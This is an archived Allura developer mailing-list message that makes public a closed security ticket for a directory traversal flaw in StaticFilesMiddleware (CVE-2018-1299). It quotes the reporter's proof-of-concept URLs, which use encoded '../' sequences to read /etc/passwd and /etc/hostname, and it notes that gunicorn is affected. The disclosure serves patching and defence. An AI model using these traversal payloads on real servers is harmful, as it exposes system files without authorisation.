allura-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Dave Brondsema" <>
Subject [allura:tickets] #8180 StaticFilesMiddleware allows directory traversal
Date Tue, 06 Feb 2018 17:55:40 GMT
- **private**: Yes --> No


** [tickets:#8180] StaticFilesMiddleware allows directory traversal**

**Status:** closed
**Milestone:** v1.8.0
**Labels:** security 
**Created:** Mon Jan 29, 2018 06:28 PM UTC by Dave Brondsema
**Last Updated:** Mon Feb 05, 2018 04:59 PM UTC
**Owner:** Dave Brondsema

>From reporter:

> The vulnerability allows unauthenticated attackers to retrieve
> arbitrary files from the Allura web server.
> PoC URsL:
> http://<allura-web-server>/nf/1276635823/_static_/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
> http://<allura-web-server>/nf/1276635823/_static_/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname


The %2F does't seem necessary in my testing.  The paster, nginx and apache/mod_wsgi servers
seem to protect against this, but gunicorn (which we recommend for production) permits the

This has been assigned CVE-2018-1299


Sent from because is subscribed to

To unsubscribe from further messages, a project admin can change settings at
 Or, if this is a mailing list, you can unsubscribe from the mailing list.
  • Unnamed multipart/related (inline, None, 0 bytes)
View raw message